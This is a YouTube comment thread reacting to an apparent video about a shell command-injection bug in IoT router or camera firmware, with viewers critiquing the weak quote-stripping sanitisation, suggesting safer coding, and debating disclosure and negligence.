@aftbit2 ай бұрын
It looks like they tried to sanitize quotes (the single character 0x22 they remove) but didn't realize that double quotes still allow string interpolation? What I don't get is why don't they pass the atoi'd result into the sprintf? They only compare that value to zero so they can issue an extra disable command. They could have done the zero comparison without converting to an integer, and since they already took atoi, they could have avoided the main security bug by using the integer in the string interpolation. There are two bugs in six lines of code. :/
@jamess17872 ай бұрын
Thanks Triple L, youre the best
@DaremKurosaki2 ай бұрын
I really hope it isn't, but that router looked like a netgear nighthawk.
@TeejMcSteez2 ай бұрын
It looks like I was a chump who bought one back in the day too 😭
@YaySyu2 ай бұрын
@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying
@anoobis1172 ай бұрын
Thanks, Triple L, you're the best.
@sinistar31982 ай бұрын
4:00 I am going to vomit.
@min3craftpolska514Ай бұрын
I'm taking a wild guess, it's probably netgear
@ZackWhitbord2 ай бұрын
Sexually frustrating indeed
@ericytff73882 ай бұрын
Its 5am im on 4 hours of sleep and on my way to the airport, Thanks for zooming in LLL
@privacyvalued41342 ай бұрын
Even more fun is that you can place an ad with an ad network that executes this code remotely when people run their web browsers on the same network as their IoT devices. I think it's crazy that "Triple-L" runs without any web browser plugins to secure his own network from drive-by malware.
@lachlanwilger50442 ай бұрын
Thanks for doing a deep dive into the actual part of the firmware itself that caused the vulnerability!
@MrJake-bb8bs2 ай бұрын
But they've tried to sanitize the input and remove any double quotes (because the parameter is enquoted in ") The thing is bash/sh still parses it. They could've got away with this if they used single quotes as these are not parsed by the shell. Or just don't run pipe so simple things into a shell
@patsonical2 ай бұрын
> They could've got away with this if they used single quotes as these are not parsed by the shell. Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway
@MrJake-bb8bs2 ай бұрын
@@patsonical They did this absolute minimum of removing quotes
@XRatedPoetry2 ай бұрын
Ghidra properly decoding the entire file is probably the craziest thing in this video
@offtheball872 ай бұрын
This smells like code someone wrote at 2am as a part of a proof of concept that just stuck around into production, and no one's ever gone back, because that part of the code works and isn't driving new features. Which is part of why the feature focus of software development these days irks me. Our jobs are framed features that solve user stories, or enablers to features that solve user stories, but so rarely on upkeep. This code needed to be torn out and rewritten long ago, but customers aren't asking for that.
@1783W2 ай бұрын
@@offtheball87 customers definitely want safety. It seems more like a leadership problem.
@offtheball872 ай бұрын
@1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.
@Bramble203222 ай бұрын
@@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.
@ai-aniverse2 ай бұрын
I think this definitely falls into gross negligence. The problem is: *Who wrote it *What certifications they had *What certifications / standards are even applicable? *What standards are even being presumed by the customer?
@k1ngjulien_2 ай бұрын
OMG they are litteraly just writing a string to a driver file!! WE HAVE A WRITE SYSCALL WHY ARE YOU SPAWNING A SHELLLLL!?!?!?!?!?! EVEN WITHOUT SANITIZATION THAT WOULD HAVE EASIER, FASTER AND SAFER
@supercellex4D2 ай бұрын
This is why I hate Unix
@k1ngjulien_2 ай бұрын
@@supercellex4D lol what? windows has the same things lol
@flyinginthedark61882 ай бұрын
Instead of snprintf + system, they could have done fopen + fprintf + fclose, but that's one line more to type, probably too lazy to do it
@not-pyroman2 ай бұрын
@@supercellex4D blame the devs for their bad practice? Nah Blame the OS? Of course, because it's *definitely* the fault of the OS
@supercellex4D2 ай бұрын
@@not-pyroman Only Unix insists on magic files over documented predictable APIs
@SourceCodeDeleted2 ай бұрын
Yeah another one of these. I have seen tons of them. And it's weird that they never really get fixed or resolved. Even when a newer version of the same router comes out. It's like they start from scratch each time.
@zelllers2 ай бұрын
INTERNET OF SHIT
@user-nl2ho9gk3y2 ай бұрын
apple IOS ? 🤣
@ninetydirectory37982 ай бұрын
@@user-nl2ho9gk3y "Apple iOS"
@Mallchad2 ай бұрын
Smart device -> Dumb Device
@jonwatte42932 ай бұрын
Downloadable firmware isn't bad -- open auditing is step one of a strong security engineering culture. If your security relies on obscurity, the bad guys will still find it but the good guys will have a harder time diagnosing it!
@Gunstick2 ай бұрын
If they would have written their cgi code in bash, then they would not need to call system and the code is then secure. Yes. Most secure code for web applications is... the shell! Fight me!
@__christopher__2 ай бұрын
Well, the ultimate step in the exploit was exploiting bash (actually sh, which depending on the system may or may not be bash).
@Gunstick2 ай бұрын
@@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.
@raddastronaut2 ай бұрын
This is such a good channel. Great content and breakdowns.
@jerrody54002 ай бұрын
Researchers be like: - Found unpatchable 0-day vulnerability in cameras? Let's post it into public!
@AndrewTSq2 ай бұрын
This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.
@kentacy692 ай бұрын
Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?
@Bramble203222 ай бұрын
@@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.
@bvcdi2 ай бұрын
As a low level software developer this channel is exactly what this area needs. This sub domain is filled with people that release in productions products with parts of generic demo software. They think if they know how to use Arduino or other hobby tools like that they are qualified to develop highly integrated devices with complex systems. I know there is a pressure from the management to develop fast products, but I think we should have to courage to say wait a little, let me write the code, and stop copy code that we have no idea what contains. Anyway.....I may be considered and old dinosaur, but I like to have every part of my code write by me and my guys.....so that if any thing happens we can understand why and from where it is happening. Yes this may take long, but surely helps during the life time of the project and also adds to the security of the product. Yeah use opensource code, but review it first and try to identify any weakness it may contain, don't copy-paste just so that management is happy. Any way....nice video...liked it!
@JoeJoeTater2 ай бұрын
Thanks, Triple-L. You're the best!
@daviddunmore84152 ай бұрын
Always validate input to a function, I've spent ours in the wee small hours fixing programs because there was no validation. The problem was usually nulls in a numeric field in a file coming from outside the business.
@AkshansYoutubeAccount2 ай бұрын
today i got asked again to turn on my cam and when absolut darkness was present and ppl got confused, i explained that i taped over my cam. thank you for letting me know my reevaluation was correct.
@jrsmeets2 ай бұрын
LLL you’re great. The code you showed was clearly legible on mobile.
@biffjones260122 күн бұрын
Pressure to complete projects too quickly leads to this kind of negligence.
@uuu123432 ай бұрын
Man, I still remember first learning about IoT in around 2015 and my first thought was "Wait, that sounds dangerous" Good to know that even though I was technically new, it wasnt just me being a newbie and didnt know anything at the time
@hesar19752 ай бұрын
its ALWAYS the same way, ages ago we developed some protocols like smtp, pop, http and similar, guys writing the code NEVER thought about bad actors attacking those, that is why now we are fighting hard to have safer versions of such protocols, in parallel, it happened to e.g. machinery/cars communications protocols, not a single engineer developing CAN bus was expecting CAN bus exposed via wi-fi, and obviously for IoT it is even more difficult as very often it is coded by not very skilled people, never ever having any security experience, and their managers having such neither (obviously it also increases costs when cost is crucial to sell such crap), greetings from Poland, I love your vids sir
@_wazner2 ай бұрын
Funny how they thought that removing `"` (the 0x22 removal right before execution) is enough sanitization. I won't say that they do not sanitize, they didn't sanitize properly; which is a mark of someone who does know how the shell works.
@mikeh54932 ай бұрын
First time watching. You got some mad skills. Thank you!
@scaredyfish2 ай бұрын
The function is called cgi_safe_snprintf, which I would naively assume is doing some sort of sanitization.
@technikschaf15742 ай бұрын
Companies not having the binaries to download would just be security by obscurity. Great idea....
@ErazerPT2 ай бұрын
IoT (and most embeded if we're to be honest) is "Ship fast" not "Ship good". The reason i write lots of stuff like that for my MCU's is that it's for personal use only, but if i ever was to ship anything, or heck, even put it on a public repo, I'd have to go and clean a lot of jank stuff.
@jsalsman2 ай бұрын
Negligence is a failure to exercise reasonable care, while gross negligence is a reckless disregard for safety. It's just simple negligence, and you can bet it's disclaimed as such in the terms of sale echoing the UCC terms. If it ever got to court, the defense would have no shortage of experts willing to testify the bug isn't unreasonable care, and I can think of several possibilities under which I would agree. For example, whoever wrote the code may not have known that it would ever be exposed to the public internet.
@emanuellandeholm56572 ай бұрын
Internet of Shit. We warned about these devices more than a decade ago. Now the chickens have come back to roost and my surprise is 0%.
@edwardallenthree2 ай бұрын
These injection attacks always remind me of Johnny tables at XKCD. Always validate your inputs!